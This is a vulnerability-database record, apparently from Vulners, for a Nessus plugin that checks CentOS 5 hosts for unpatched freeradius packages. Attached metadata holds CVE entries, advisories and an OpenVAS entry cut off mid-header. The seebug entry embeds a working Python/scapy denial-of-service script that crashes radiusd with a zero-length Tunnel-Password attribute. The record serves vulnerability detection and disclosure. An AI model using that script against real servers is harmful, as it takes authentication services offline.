ID CENTOS_RHSA-2009-1451.NASL Type nessus Reporter This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2010-01-06T00:00:00
Description
Updated freeradius packages that fix a security issue are now
available for Red Hat Enterprise Linux 5.
This update has been rated as having moderate security impact by the
Red Hat Security Response Team.
FreeRADIUS is a high-performance and highly configurable free Remote
Authentication Dial In User Service (RADIUS) server, designed to allow
centralized authentication and authorization for a network.
An input validation flaw was discovered in the way FreeRADIUS decoded
specific RADIUS attributes from RADIUS packets. A remote attacker
could use this flaw to crash the RADIUS daemon (radiusd) via a
specially crafted RADIUS packet. (CVE-2009-3111)
Users of FreeRADIUS are advised to upgrade to these updated packages,
which contain a backported patch to correct this issue. After
installing the update, radiusd will be restarted automatically.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2009:1451 and
# CentOS Errata and Security Advisory 2009:1451 respectively.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration pass: when `description` is set, this block only records plugin
# metadata. It ends in exit(0), so none of the package checks further down run
# in this pass.
if (description)
{
script_id(43791);
script_version("1.12");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");
# Two CVE IDs are tracked although the description text below names only
# CVE-2009-3111. NVD describes CVE-2009-3111 as a regression related to
# CVE-2003-0967, which would also explain the 2003 vuln_publication_date.
script_cve_id("CVE-2003-0967", "CVE-2009-3111");
script_xref(name:"RHSA", value:"2009:1451");
script_name(english:"CentOS 5 : freeradius (CESA-2009:1451)");
script_summary(english:"Checks rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:"The remote CentOS host is missing one or more security updates."
);
# Advisory text carried over from RHSA-2009:1451 (see the file header), which
# is why it speaks of Red Hat Enterprise Linux 5 in a CentOS plugin.
script_set_attribute(
attribute:"description",
value:
"Updated freeradius packages that fix a security issue are now
available for Red Hat Enterprise Linux 5.
This update has been rated as having moderate security impact by the
Red Hat Security Response Team.
FreeRADIUS is a high-performance and highly configurable free Remote
Authentication Dial In User Service (RADIUS) server, designed to allow
centralized authentication and authorization for a network.
An input validation flaw was discovered in the way FreeRADIUS decoded
specific RADIUS attributes from RADIUS packets. A remote attacker
could use this flaw to crash the RADIUS daemon (radiusd) via a
specially crafted RADIUS packet. (CVE-2009-3111)
Users of FreeRADIUS are advised to upgrade to these updated packages,
which contain a backported patch to correct this issue. After
installing the update, radiusd will be restarted automatically."
);
# The shortened nessus.org links are expected to resolve to the CentOS
# announce posts named in the comment above each one - TODO confirm.
# https://lists.centos.org/pipermail/centos-announce/2009-October/016228.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?1fd2b45c"
);
# https://lists.centos.org/pipermail/centos-announce/2009-October/016229.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?d79b04e7"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected freeradius packages."
);
# CVSS v2 vector: network-reachable, low complexity, no authentication,
# availability impact only - consistent with the remote radiusd crash
# described in the advisory text.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
# "local" check: the verdict comes from host data collected beforehand (see
# script_dependencies / script_require_keys at the end of this block), not
# from traffic sent to radiusd.
script_set_attribute(attribute:"plugin_type", value:"local");
# Packages and platform this check covers.
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:freeradius");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:freeradius-mysql");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:freeradius-postgresql");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:freeradius-unixODBC");
script_set_attribute(attribute:"cpe", value:"cpe:/o:centos:centos:5");
# vuln date follows the older CVE; patch date is the CentOS erratum.
script_set_attribute(attribute:"vuln_publication_date", value:"2003/12/15");
script_set_attribute(attribute:"patch_publication_date", value:"2009/10/30");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/01/06");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
# Information-gathering category.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"CentOS Local Security Checks");
# Depends on ssh_get_info.nasl and on the three KB entries below; the check
# logic later in the file reads the same entries again at run time.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/CentOS/release", "Host/CentOS/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Check logic: decides from cached host facts (KB items) whether the CentOS 5
# freeradius packages are behind the fixed build 1.1.3-1.5.el5_4.
# Each audit() call is assumed to stop the plugin with the stated reason
# (audit.inc is not shown here), so the statements below act as ordered gates.
# NOTE(review): this compares package versions only; nothing here inspects the
# running radiusd process, so it does not confirm the daemon was restarted
# onto the patched binary.

# Gate 1: without authenticated local checks there is no package inventory.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
# Gate 2: the host must identify as CentOS.
release = get_kb_item("Host/CentOS/release");
if (isnull(release) || "CentOS" >!< release) audit(AUDIT_OS_NOT, "CentOS");
# Gate 3: extract the major release number; only 5.x is in scope. The
# "^5([^0-9]|$)" pattern accepts "5" but rejects values such as "50".
os_ver = pregmatch(pattern: "CentOS(?: Linux)? release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "CentOS");
os_ver = os_ver[1];
if (! preg(pattern:"^5([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "CentOS 5.x", "CentOS " + os_ver);
# Gate 4: the collected rpm list must be present.
if (!get_kb_item("Host/CentOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
# Gate 5: only x86_64 and i386-i686 are handled; any other architecture is
# audited as "not implemented" rather than as "not affected".
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "CentOS", cpu);
# One rpm_check per package against the fixed build; flag counts the checks
# that return true. rpm_check lives in rpm.inc - presumably true means the
# installed package is older than the reference; confirm there.
flag = 0;
if (rpm_check(release:"CentOS-5", reference:"freeradius-1.1.3-1.5.el5_4")) flag++;
if (rpm_check(release:"CentOS-5", reference:"freeradius-mysql-1.1.3-1.5.el5_4")) flag++;
if (rpm_check(release:"CentOS-5", reference:"freeradius-postgresql-1.1.3-1.5.el5_4")) flag++;
if (rpm_check(release:"CentOS-5", reference:"freeradius-unixODBC-1.1.3-1.5.el5_4")) flag++;
# At least one check fired: report at warning severity on port 0, attaching
# the text returned by rpm_report_get().
if (flag)
{
security_report_v4(
port : 0,
severity : SECURITY_WARNING,
extra : rpm_report_get()
);
exit(0);
}
# Nothing flagged: audit as "not affected" when pkg_tests_get() returns a
# value and as "not installed" otherwise, so a clean result is not mistaken
# for an absent package. (Presumably `tested` lists the packages that were
# actually compared - confirm in rpm.inc.)
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "freeradius / freeradius-mysql / freeradius-postgresql / etc");
}
{"id": "CENTOS_RHSA-2009-1451.NASL", "bulletinFamily": "scanner", "title": "CentOS 5 : freeradius (CESA-2009:1451)", "description": "Updated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.", "published": "2010-01-06T00:00:00", "modified": "2010-01-06T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/43791", "reporter": "This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?1fd2b45c", "http://www.nessus.org/u?d79b04e7"], "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "type": "nessus", "lastseen": "2021-01-06T09:25:55", "edition": 25, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0967", "CVE-2009-3111"]}, {"type": "seebug", "idList": ["SSV:14525"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22450", "SECURITYVULNS:VULN:10230"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310880824", "OPENVAS:830798", "OPENVAS:66614", "OPENVAS:1361412562310830798", "OPENVAS:66166", "OPENVAS:136141256231064905", "OPENVAS:136141256231066166", "OPENVAS:64905", "OPENVAS:880824", "OPENVAS:136141256231066614"]}, {"type": "nessus", "idList": ["SL_20090917_FREERADIUS_ON_SL5_X.NASL", "UBUNTU_USN-832-1.NASL", "SUSE_FREERADIUS-6528.NASL", "MANDRIVA_MDVSA-2009-227.NASL", "SUSE_FREERADIUS-6499.NASL", "SUSE9_12507.NASL", "ORACLELINUX_ELSA-2009-1451.NASL", "REDHAT-RHSA-2003-386.NASL", "REDHAT-RHSA-2009-1451.NASL", "SUSE_FREERADIUS-6496.NASL"]}, {"type": "redhat", "idList": ["RHSA-2003:386", "RHSA-2009:1451"]}, {"type": "exploitdb", "idList": ["EDB-ID:9642", "EDB-ID:23391"]}, {"type": "osvdb", "idList": ["OSVDB:2850"]}, {"type": "ubuntu", "idList": ["USN-832-1"]}, {"type": "centos", "idList": ["CESA-2009:1451"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:81198"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1451"]}, {"type": "freebsd", "idList": ["1B3F854B-E4BD-11DE-B276-000D8787E1BE"]}, {"type": "zdt", "idList": ["1337DAY-ID-7004"]}], "modified": "2021-01-06T09:25:55", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-01-06T09:25:55", "rev": 2}, "vulnersScore": 5.9}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1451 and \n# CentOS Errata and 
Security Advisory 2009:1451 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43791);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_xref(name:\"RHSA\", value:\"2009:1451\");\n\n script_name(english:\"CentOS 5 : freeradius (CESA-2009:1451)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. 
After\ninstalling the update, radiusd will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-October/016228.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1fd2b45c\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-October/016229.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d79b04e7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected freeradius packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius / freeradius-mysql / freeradius-postgresql / etc\");\n}\n", "naslFamily": "CentOS Local Security Checks", "pluginID": "43791", "cpe": ["p-cpe:/a:centos:centos:freeradius-unixODBC", 
"p-cpe:/a:centos:centos:freeradius-mysql", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:freeradius-postgresql", "p-cpe:/a:centos:centos:freeradius"], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:21:07", "description": "rad_decode in FreeRADIUS 0.9.2 and earlier allows remote attackers to cause a denial of service (crash) via a short RADIUS string attribute with a tag, which causes memcpy to be called with a -1 length argument, as demonstrated using the Tunnel-Password attribute.", "edition": 5, "cvss3": {}, "published": "2003-12-15T05:00:00", "title": "CVE-2003-0967", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0967"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/a:freeradius:freeradius:0.9.2"], "id": "CVE-2003-0967", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0967", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:freeradius:freeradius:0.9.2:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:22", "description": "The rad_decode function in FreeRADIUS before 1.1.8 allows remote attackers to cause a denial of service (radiusd crash) via zero-length Tunnel-Password attributes, as demonstrated by a certain module in VulnDisco Pack Professional 7.6 through 8.11. 
NOTE: this is a regression error related to CVE-2003-0967.", "edition": 5, "cvss3": {}, "published": "2009-09-09T18:30:00", "title": "CVE-2009-3111", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3111"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:freeradius:freeradius:1.1.6", "cpe:/a:freeradius:freeradius:0.8", "cpe:/a:freeradius:freeradius:0.8.1", "cpe:/a:freeradius:freeradius:1.0.4", "cpe:/a:freeradius:freeradius:0.2", "cpe:/a:freeradius:freeradius:1.0.5", "cpe:/a:freeradius:freeradius:0.9", "cpe:/a:freeradius:freeradius:1.1.0", "cpe:/a:freeradius:freeradius:1.1.5", "cpe:/a:freeradius:freeradius:1.0.3", "cpe:/a:freeradius:freeradius:1.0.2", "cpe:/a:freeradius:freeradius:1.0.0", "cpe:/a:freeradius:freeradius:0.5", "cpe:/a:freeradius:freeradius:1.0.1", "cpe:/a:freeradius:freeradius:1.1.7", "cpe:/a:freeradius:freeradius:0.4", "cpe:/a:freeradius:freeradius:0.9.3", "cpe:/a:freeradius:freeradius:0.9.2", "cpe:/a:freeradius:freeradius:0.3", "cpe:/a:freeradius:freeradius:0.9.1", "cpe:/a:freeradius:freeradius:1.1.3"], "id": "CVE-2009-3111", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3111", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:freeradius:freeradius:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.9:*:*:*:*:*:*:*", 
"cpe:2.3:a:freeradius:freeradius:0.3:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.2:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.4:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.8:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T18:36:47", "description": "No description provided by source.", "published": "2009-09-11T00:00:00", "title": "FreeRadius < 1.1.8 Zero-length Tunnel-Password DoS Exploit (CVE-2009-3111)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3111"], "modified": "2009-09-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14525", "id": "SSV:14525", "sourceData": "\n #!/usr/bin/env python\r\n# FreeRadius Packet Of Death\r\n# Matthew Gillespie 2009-09-11\r\n# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py\r\n# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/\r\n\r\nimport sys\r\nfrom scapy.all import IP,UDP,send,Radius,RadiusAttr\r\n\r\nif len(sys.argv) != 2:\r\n\tprint "Usage: radius_killer.py <radiushost>\\n"\r\n\tsys.exit(1)\r\n\r\nPoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \\\r\n\tRadius(code=1,authenticator="\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99",id=180)/ \\\r\n\tRadiusAttr(type=69,value="",len=2)\r\n\r\nsend(PoD)\r\n\r\n# sebug.net\r\n\n ", 
"cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-14525"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:226\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : freeradius\r\n Date : September 10, 2009\r\n Affected: Corporate 4.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability has been found and corrected in freeradius:\r\n \r\n The rad_decode function in FreeRADIUS before 1.1.8 allows remote\r\n attackers to cause a denial of service (radiusd crash) via zero-length\r\n Tunnel-Password attributes. 
NOTE: this is a regression error related\r\n to CVE-2003-0967 (CVE-2009-3111).\r\n \r\n This update provides a solution to this vulnerability.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3111\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Corporate 4.0:\r\n 37f0dc23fdd28466d7a94db9ad445e36 corporate/4.0/i586/freeradius-1.0.4-2.5.20060mlcs4.i586.rpm\r\n e9f0aeb620f6c18f7abe8cd030ee5b45 corporate/4.0/i586/libfreeradius1-1.0.4-2.5.20060mlcs4.i586.rpm\r\n 5efc89f68a9ae3323f4d08db2db99c76 \r\ncorporate/4.0/i586/libfreeradius1-devel-1.0.4-2.5.20060mlcs4.i586.rpm\r\n 7cfebad483805297740a24c630d959c4 \r\ncorporate/4.0/i586/libfreeradius1-krb5-1.0.4-2.5.20060mlcs4.i586.rpm\r\n e9cfff1376db58a3dec1499bdada7d07 \r\ncorporate/4.0/i586/libfreeradius1-ldap-1.0.4-2.5.20060mlcs4.i586.rpm\r\n 97d0dd301a51c5402d4fdedd113a4162 \r\ncorporate/4.0/i586/libfreeradius1-mysql-1.0.4-2.5.20060mlcs4.i586.rpm\r\n 617dbfffff6ea9191afb7f9573e65883 \r\ncorporate/4.0/i586/libfreeradius1-postgresql-1.0.4-2.5.20060mlcs4.i586.rpm\r\n 3a75efd86b69a5bb0ac240d1e7c2ae75 \r\ncorporate/4.0/i586/libfreeradius1-unixODBC-1.0.4-2.5.20060mlcs4.i586.rpm \r\n a89677d75dc960fd619954eb53b4d749 corporate/4.0/SRPMS/freeradius-1.0.4-2.5.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n b4ac8ca1b8e9bca59c7f1a2b21386e65 corporate/4.0/x86_64/freeradius-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n 018ee9ffa0b73a5f5cf2b183f83deb5d \r\ncorporate/4.0/x86_64/lib64freeradius1-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n 24f796932b9ffe79093351912a1c40e7 \r\ncorporate/4.0/x86_64/lib64freeradius1-devel-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n adc0cba3f5d762c43c494aed2c2e4924 \r\ncorporate/4.0/x86_64/lib64freeradius1-krb5-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n c21d434b39fca57615932c5e4c895459 \r\ncorporate/4.0/x86_64/lib64freeradius1-ldap-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n 
b52370d5e13cb0e9534050e5f7e8a5a7 \r\ncorporate/4.0/x86_64/lib64freeradius1-mysql-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n 8bdcfbb1740d3967b5ef909f14af32c9 \r\ncorporate/4.0/x86_64/lib64freeradius1-postgresql-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n d376a3b411ecd4ed71c2289b2da536ae \r\ncorporate/4.0/x86_64/lib64freeradius1-unixODBC-1.0.4-2.5.20060mlcs4.x86_64.rpm \r\n a89677d75dc960fd619954eb53b4d749 corporate/4.0/SRPMS/freeradius-1.0.4-2.5.20060mlcs4.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFKqMYdmqjQ0CJFipgRAmWZAKDiWc30oc8TUdCK9qT5+svPaMOPzQCgm73G\r\ndGxi5xjHNGGtXkz/9cowb9A=\r\n=0yka\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-09-10T00:00:00", "published": "2009-09-10T00:00:00", "id": "SECURITYVULNS:DOC:22450", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22450", "title": "[ MDVSA-2009:226 ] freeradius", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-3111"], "description": "Crash on zero-length 
Tunnel-Password attribute.", "edition": 1, "modified": "2009-09-10T00:00:00", "published": "2009-09-10T00:00:00", "id": "SECURITYVULNS:VULN:10230", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10230", "title": "FreeRADIUS RADIUS server DoS", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-04-06T11:40:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-12-30T00:00:00", "id": "OPENVAS:136141256231066614", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066614", "type": "openvas", "title": "FreeBSD Ports: freeradius", "sourceData": "#\n#VID 1b3f854b-e4bd-11de-b276-000d8787e1be\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 1b3f854b-e4bd-11de-b276-000d8787e1be\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions 